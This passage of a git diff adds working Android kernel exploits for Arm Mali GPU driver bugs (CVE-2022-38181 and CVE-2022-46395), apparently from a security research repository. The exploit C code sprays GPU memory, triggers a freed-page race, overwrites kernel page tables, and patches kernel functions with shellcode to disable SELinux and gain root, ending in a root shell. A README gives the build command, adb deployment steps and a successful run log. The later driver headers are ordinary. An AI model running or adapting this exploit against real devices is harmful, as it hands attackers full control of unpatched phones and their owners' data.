MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); +} + +void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t)); + + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + //Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); +} + +void spray(int mali_fd) { + uint64_t cookies[32] = {0}; + for (int j = 0; j < 32; j++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22); + alloc.in.va_pages = SPRAY_PAGES; + alloc.in.commit_pages = 0; + mem_alloc(mali_fd, &alloc); + cookies[j] = alloc.out.gpu_va; + } + for (int j = 0; j < 32; j++) { + void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j]); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + gpu_va[j] = (uint64_t)region; + } + for (int j = 32; j < 64; j++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22); + alloc.in.va_pages = SPRAY_PAGES; + alloc.in.commit_pages = 0; + mem_alloc(mali_fd, &alloc); + cookies[j - 32] = alloc.out.gpu_va; + } + for (int j = 32; j < 64; j++) { + void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j - 32]); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + gpu_va[j] = (uint64_t)region; + } +} + +int trigger(int mali_fd, int mali_fd2, int* flush_idx) { + if (*flush_idx + NUM_TRIALS > FLUSH_REGION_SIZE) { + err(1, "Out of memory."); + } + void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0); + + uint64_t jit_pages = SPRAY_PAGES; + uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr); + atom_number++; + mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0); + for (int i = 0; i < NUM_TRIALS; i++) { + union kbase_ioctl_mem_query query = {0}; + query.in.gpu_addr = jit_addr; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + flush_regions[i] = flush(SPRAY_CPU, i + *flush_idx); + if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0) { + migrate_to_cpu(SPRAY_CPU); + spray(mali_fd); + for (int j = 0; j < SPRAY_NUM; j++) { + mem_commit(mali_fd, gpu_va[j], SPRAY_PAGES); + } + LOG("region freed %d\n", i); + + uint64_t alias_region = alias_sprayed_regions(mali_fd); + fault_pages(); + LOG("cleanup flush region\n"); + for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE); + + uint64_t drain = drain_mem_pool(mali_fd); + release_mem_pool(mali_fd, drain); + + jit_free(mali_fd, atom_number, jit_id); + + map_reserved(mali_fd2, RESERVED_SIZE, 
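+      /* mapping the second context's reserved regions matters because their
+         GPU VAs, rounded by set_addr_lv3() to level-3 index 0x100
+         (= OVERWRITE_INDEX), are the addresses write_func() writes through
+         once the freed PGD's entry at that index points at kernel code */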
TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+      LOG("jit_freed\n");
+      int freed_idx = find_freed_idx(mali_fd);
+      if (freed_idx == -1) err(1, "Failed to find freed_idx");
+      LOG("Found freed_idx %d\n", freed_idx);
+      int pgd_idx = find_pgd(freed_idx, 0);
+      if (pgd_idx == -1) err(1, "Failed to find pgd");
+      uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000);
+      LOG("Found pgd %d, %lx\n", pgd_idx, pgd);
+      atom_number++;
+      write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
+      run_enforce();
+      cleanup(mali_fd, pgd);
+      return 0;
+    }
+  }
+  LOG("failed, retry.\n");
+  jit_id++;
+  *flush_idx += NUM_TRIALS;
+  return -1;
+}
+
+#ifdef SHELL
+
+int main() {
+  setbuf(stdout, NULL);
+  setbuf(stderr, NULL);
+
+  select_offset();
+  int mali_fd = open_dev(MALI);
+
+  setup_mali(mali_fd, 0);
+
+  void* tracking_page = setup_tracking_page(mali_fd);
+  jit_init(mali_fd, 0x1000, 100, 0);
+
+  int mali_fd2 = open_dev(MALI);
+  setup_mali(mali_fd2, 1);
+  setup_tracking_page(mali_fd2);
+  reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+  int flush_idx = 0;
+  for (int i = 0; i < 10; i++) {
+    if (!trigger(mali_fd, mali_fd2, &flush_idx)) {
+      system("sh");
+      break;
+    }
+  }
+}
+#else
+#include <jni.h>
+JNIEXPORT int JNICALL
+Java_com_example_hellojni_MaliExpService_stringFromJNI(JNIEnv* env, jobject thiz)
+{
+  setbuf(stdout, NULL);
+  setbuf(stderr, NULL);
+
+  select_offset();
+  int mali_fd = open_dev(MALI);
+
+  setup_mali(mali_fd, 0);
+
+  void* tracking_page = setup_tracking_page(mali_fd);
+  jit_init(mali_fd, 0x1000, 100, 0);
+
+  int mali_fd2 = open_dev(MALI);
+  setup_mali(mali_fd2, 1);
+  setup_tracking_page(mali_fd2);
+  reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+  int flush_idx = 0;
+  for (int i = 0; i < 10; i++) {
+    if (!trigger(mali_fd, mali_fd2, &flush_idx)) {
+      LOG("uid: %d euid %d", getuid(), geteuid());
+      return 0;
+    }
+  }
+  return -1;
+}
+#endif
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h b/SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h
new file mode 100644
index 0000000..e0ce432
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h
@@ -0,0 +1,260 @@
+#ifndef MIDGARD_H
+#define MIDGARD_H
+
+//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
+
+#include <stdio.h>
+#include <stdint.h>
+#include <stdbool.h>
+#include <inttypes.h>
+#include <string.h>
+#include <assert.h>
+#include <math.h>
+
+#define pan_section_ptr(base, A, S) \
+        ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET))
+
+#define pan_section_pack(dst, A, S, name) \
+   for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \
+        *_loop_terminate = (void *) (dst); \
+        __builtin_expect(_loop_terminate != NULL, 1); \
+        ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \
+           _loop_terminate = NULL; }))
+
+
+static inline uint64_t
+__gen_uint(uint64_t v, uint32_t start, uint32_t end)
+{
+#ifndef NDEBUG
+   const int width = end - start + 1;
+   if (width < 64) {
+      const uint64_t max = (1ull << width) - 1;
+      assert(v <= max);
+   }
+#endif
+
+   return v << start;
+}
+
+static inline uint64_t
+__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end)
+{
+   uint64_t val = 0;
+   const int width = end - start + 1;
+   const uint64_t mask = (width == 64 ?
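+      /* a shift by the full word width (1ull << 64) is undefined behaviour
+         in C, so 64-bit fields take the all-ones mask directly */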
~0 : (1ull << width) - 1 ); + + for (int byte = start / 8; byte <= end / 8; byte++) { + val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8); + } + + return (val >> (start % 8)) & mask; +} + +enum mali_job_type { + MALI_JOB_TYPE_NOT_STARTED = 0, + MALI_JOB_TYPE_NULL = 1, + MALI_JOB_TYPE_WRITE_VALUE = 2, + MALI_JOB_TYPE_CACHE_FLUSH = 3, + MALI_JOB_TYPE_COMPUTE = 4, + MALI_JOB_TYPE_VERTEX = 5, + MALI_JOB_TYPE_GEOMETRY = 6, + MALI_JOB_TYPE_TILER = 7, + MALI_JOB_TYPE_FUSED = 8, + MALI_JOB_TYPE_FRAGMENT = 9, +}; + +enum mali_write_value_type { + MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1, + MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2, + MALI_WRITE_VALUE_TYPE_ZERO = 3, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7, +}; + + +struct MALI_WRITE_VALUE_JOB_PAYLOAD { + uint64_t address; + enum mali_write_value_type type; + uint64_t immediate_value; +}; + +struct MALI_JOB_HEADER { + uint32_t exception_status; + uint32_t first_incomplete_task; + uint64_t fault_pointer; + bool is_64b; + enum mali_job_type type; + bool barrier; + bool invalidate_cache; + bool suppress_prefetch; + bool enable_texture_mapper; + bool relax_dependency_1; + bool relax_dependency_2; + uint32_t index; + uint32_t dependency_1; + uint32_t dependency_2; + uint64_t next; +}; + + +static inline void +MALI_JOB_HEADER_pack(uint32_t * restrict cl, + const struct MALI_JOB_HEADER * restrict values) +{ + cl[ 0] = __gen_uint(values->exception_status, 0, 31); + cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31); + cl[ 2] = __gen_uint(values->fault_pointer, 0, 63); + cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32; + cl[ 4] = __gen_uint(values->is_64b, 0, 0) | + __gen_uint(values->type, 1, 7) | + __gen_uint(values->barrier, 8, 8) | + __gen_uint(values->invalidate_cache, 9, 9) | + __gen_uint(values->suppress_prefetch, 11, 11) | + __gen_uint(values->enable_texture_mapper, 12, 12) | + __gen_uint(values->relax_dependency_1, 14, 14) | + __gen_uint(values->relax_dependency_2, 15, 15) | + __gen_uint(values->index, 16, 31); + cl[ 5] = __gen_uint(values->dependency_1, 0, 15) | + __gen_uint(values->dependency_2, 16, 31); + cl[ 6] = __gen_uint(values->next, 0, 63); + cl[ 7] = __gen_uint(values->next, 0, 63) >> 32; +} + + +#define MALI_JOB_HEADER_LENGTH 32 +struct mali_job_header_packed { uint32_t opaque[8]; }; +static inline void +MALI_JOB_HEADER_unpack(const uint8_t * restrict cl, + struct MALI_JOB_HEADER * restrict values) +{ + if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n"); + values->exception_status = __gen_unpack_uint(cl, 0, 31); + values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63); + values->fault_pointer = __gen_unpack_uint(cl, 64, 127); + values->is_64b = __gen_unpack_uint(cl, 128, 128); + values->type = __gen_unpack_uint(cl, 129, 135); + values->barrier = __gen_unpack_uint(cl, 136, 136); + values->invalidate_cache = __gen_unpack_uint(cl, 137, 137); + values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139); + values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140); + values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142); + values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143); + values->index = __gen_unpack_uint(cl, 144, 159); + values->dependency_1 = __gen_unpack_uint(cl, 160, 175); + values->dependency_2 = __gen_unpack_uint(cl, 176, 191); + values->next = __gen_unpack_uint(cl, 192, 255); +} + +static inline const char * 
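+/* The *_as_str and *_print helpers below are debugging aids for decoded job
+   descriptors; the exploit itself only calls the _pack() helpers. */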
+mali_job_type_as_str(enum mali_job_type imm) +{ + switch (imm) { + case MALI_JOB_TYPE_NOT_STARTED: return "Not started"; + case MALI_JOB_TYPE_NULL: return "Null"; + case MALI_JOB_TYPE_WRITE_VALUE: return "Write value"; + case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush"; + case MALI_JOB_TYPE_COMPUTE: return "Compute"; + case MALI_JOB_TYPE_VERTEX: return "Vertex"; + case MALI_JOB_TYPE_GEOMETRY: return "Geometry"; + case MALI_JOB_TYPE_TILER: return "Tiler"; + case MALI_JOB_TYPE_FUSED: return "Fused"; + case MALI_JOB_TYPE_FRAGMENT: return "Fragment"; + default: return "XXX: INVALID"; + } +} + +static inline void +MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent) +{ + fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status); + fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task); + fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer); + fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false"); + fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type)); + fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false"); + fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false"); + fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false"); + fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false"); + fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false"); + fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false"); + fprintf(fp, "%*sIndex: %u\n", indent, "", values->index); + fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1); + fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2); + fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next); +} + +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl, + const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values) +{ + cl[ 0] = __gen_uint(values->address, 0, 63); + cl[ 1] = __gen_uint(values->address, 0, 63) >> 32; + cl[ 2] = __gen_uint(values->type, 0, 31); + cl[ 3] = 0; + cl[ 4] = __gen_uint(values->immediate_value, 0, 63); + cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32; +} + + +#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24 +#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0 + + +struct mali_write_value_job_payload_packed { uint32_t opaque[6]; }; +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl, + struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values) +{ + if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n"); + values->address = __gen_unpack_uint(cl, 0, 63); + values->type = __gen_unpack_uint(cl, 64, 95); + values->immediate_value = __gen_unpack_uint(cl, 128, 191); +} + +static inline const char * +mali_write_value_type_as_str(enum mali_write_value_type imm) +{ + switch (imm) { + case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter"; + case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp"; + case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32"; + case 
MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64";
+   default: return "XXX: INVALID";
+   }
+}
+
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent)
+{
+   fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address);
+   fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type));
+   fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value);
+}
+
+struct mali_write_value_job_packed {
+   uint32_t opaque[14];
+};
+
+#define MALI_JOB_HEADER_header \
+   .is_64b = true
+
+#define MALI_WRITE_VALUE_JOB_LENGTH 56
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32
+
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/README.md b/SecurityExploits/Android/Mali/CVE_2022_46395/README.md
new file mode 100644
index 0000000..c16225f
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/README.md
@@ -0,0 +1,54 @@
+## Exploit for CVE-2022-46395
+
+The write-up can be found [here](https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+
+The exploit is tested on the Google Pixel 6 with the November 2022 and January 2023 patches. For reference, I used the following command to compile with clang in ndk-21:
+
+```
+android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o mali_user_buf
+```
+
+The exploit should be run a couple of minutes after boot and may need to run for a few minutes to succeed. It is not uncommon for it to fail the race condition hundreds of times, but a failed attempt has no ill effect and the exploit as a whole rarely crashes. If successful, it should disable SELinux and gain root.
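+
+For completeness, a typical way to get the binary onto a device and run it from an adb shell looks like this (the on-device path is only an example):
+
+```
+adb push mali_user_buf /data/local/tmp/
+adb shell chmod +x /data/local/tmp/mali_user_buf
+adb shell /data/local/tmp/mali_user_buf
+```
+
+A successful run looks like the following transcript, ending in a root shell: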
+
+```
+oriole:/ $ /data/local/tmp/mali_user_buf
+fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
+benchmark_time 357
+failed after 100
+failed after 200
+failed after 300
+benchmark_time 343
+failed after 400
+failed after 500
+failed after 600
+benchmark_time 337
+failed after 700
+failed after 800
+failed after 900
+benchmark_time 334
+failed after 1000
+failed after 1100
+failed after 1200
+benchmark_time 363
+failed after 1300
+finished reset: 190027720 fault: 135735849 772 err 0 read 3
+found pgd at page 4
+overwrite addr : 76f6100710 710
+overwrite addr : 76f5f00710 710
+overwrite addr : 76f6100710 710
+overwrite addr : 76f5f00710 710
+overwrite addr : 76f5d00710 710
+overwrite addr : 76f5b00710 710
+overwrite addr : 76f5d00710 710
+overwrite addr : 76f5b00710 710
+overwrite addr : 76f6100fd4 fd4
+overwrite addr : 76f5f00fd4 fd4
+overwrite addr : 76f6100fd4 fd4
+overwrite addr : 76f5f00fd4 fd4
+overwrite addr : 76f5d00fd4 fd4
+overwrite addr : 76f5b00fd4 fd4
+overwrite addr : 76f5d00fd4 fd4
+overwrite addr : 76f5b00fd4 fd4
+result 50
+oriole:/ #
+```
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h b/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h
new file mode 100644
index 0000000..0a4172c
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h
@@ -0,0 +1,11 @@
+#ifndef LOG_UTILS_H
+#define LOG_UTILS_H
+
+#ifdef SHELL
+#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
+#else
+#include <android/log.h>
+#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
+#endif
+
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mali.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mali.h
new file mode 100644
index 0000000..3b61e20
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mali.h
@@ -0,0 +1,1060 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_KBASE_JM_IOCTL_H_
+#define _UAPI_KBASE_JM_IOCTL_H_
+
+#include <linux/ioctl.h>
+#include <linux/types.h>
+
+/*
+ * 11.1:
+ * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags
+ * 11.2:
+ * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED,
+ *   which some user-side clients prior to 11.2 might fault if they received
+ *   them
+ * 11.3:
+ * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and
+ *   KBASE_IOCTL_STICKY_RESOURCE_UNMAP
+ * 11.4:
+ * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET
+ * 11.5:
+ * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD)
+ * 11.6:
+ * - Added flags field to base_jit_alloc_info structure, which can be used to
+ *   specify pseudo chunked tiler alignment for JIT allocations.
+ * 11.7: + * - Removed UMP support + * 11.8: + * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags + * 11.9: + * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY + * under base_mem_alloc_flags + * 11.10: + * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for + * JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations + * with one softjob. + * 11.11: + * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags + * 11.12: + * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS + * 11.13: + * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT + * 11.14: + * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set + * under base_mem_alloc_flags + * 11.15: + * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags. + * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be + * passed to mmap(). + * 11.16: + * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf. + * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for + * dma-buf. Now, buffers are mapped on GPU when first imported, no longer + * requiring external resource or sticky resource tracking. UNLESS, + * CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled. + * 11.17: + * - Added BASE_JD_REQ_JOB_SLOT. + * - Reused padding field in base_jd_atom_v2 to pass job slot number. + * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO + * 11.18: + * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags + * 11.19: + * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified. + * 11.20: + * - Added new phys_pages member to kbase_ioctl_mem_jit_init for + * KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2 + * (replacing '_OLD') and _11_5 suffixes + * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in + * base_jd_atom_v2. It must currently be initialized to zero. + * - Added heap_info_gpu_addr to base_jit_alloc_info, and + * BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's + * flags member. Previous variants of this structure are kept and given _10_2 + * and _11_5 suffixes. + * - The above changes are checked for safe values in usual builds + * 11.21: + * - v2.0 of mali_trace debugfs file, which now versions the file separately + * 11.22: + * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2. + * KBASE_IOCTL_JOB_SUBMIT supports both in parallel. + * 11.23: + * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify + * the physical memory backing of JIT allocations. This was not supposed + * to be a valid use case, but it was allowed by the previous implementation. + * 11.24: + * - Added a sysfs file 'serialize_jobs' inside a new sub-directory + * 'scheduling'. + * 11.25: + * - Enabled JIT pressure limit in base/kbase by default + * 11.26 + * - Added kinstr_jm API + * 11.27 + * - Backwards compatible extension to HWC ioctl. + * 11.28: + * - Added kernel side cache ops needed hint + * 11.29: + * - Reserve ioctl 52 + * 11.30: + * - Add a new priority level BASE_JD_PRIO_REALTIME + * - Add ioctl 54: This controls the priority setting. + * 11.31: + * - Added BASE_JD_REQ_LIMITED_CORE_MASK. + * - Added ioctl 55: set_limited_core_count. 
+ */ +#define BASE_UK_VERSION_MAJOR 11 +#define BASE_UK_VERSION_MINOR 31 + +/** + * struct kbase_ioctl_version_check - Check version compatibility between + * kernel and userspace + * + * @major: Major version number + * @minor: Minor version number + */ +struct kbase_ioctl_version_check { + __u16 major; + __u16 minor; +}; + +#define KBASE_IOCTL_VERSION_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check) + + +/** + * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel + * + * @addr: Memory address of an array of struct base_jd_atom_v2 or v3 + * @nr_atoms: Number of entries in the array + * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom) + */ +struct kbase_ioctl_job_submit { + __u64 addr; + __u32 nr_atoms; + __u32 stride; +}; + +#define KBASE_IOCTL_JOB_SUBMIT \ + _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit) + +#define KBASE_IOCTL_POST_TERM \ + _IO(KBASE_IOCTL_TYPE, 4) + +/** + * struct kbase_ioctl_soft_event_update - Update the status of a soft-event + * @event: GPU address of the event which has been updated + * @new_status: The new status to set + * @flags: Flags for future expansion + */ +struct kbase_ioctl_soft_event_update { + __u64 event; + __u32 new_status; + __u32 flags; +}; + +#define KBASE_IOCTL_SOFT_EVENT_UPDATE \ + _IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update) + +/** + * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for + * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the + * kernel + * + * @size: The size of the `struct kbase_kinstr_jm_atom_state_change` + * @version: Represents a breaking change in the + * `struct kbase_kinstr_jm_atom_state_change` + * @padding: Explicit padding to get the structure up to 64bits. See + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst + * + * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the + * end of the structure that older user space might not understand. If the + * `version` is the same, the structure is still compatible with newer kernels. + * The `size` can be used to cast the opaque memory returned from the kernel. + */ +struct kbase_kinstr_jm_fd_out { + __u16 size; + __u8 version; + __u8 padding[5]; +}; + +/** + * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor + * + * @count: Number of atom states that can be stored in the kernel circular + * buffer. Must be a power of two + * @padding: Explicit padding to get the structure up to 64bits. 
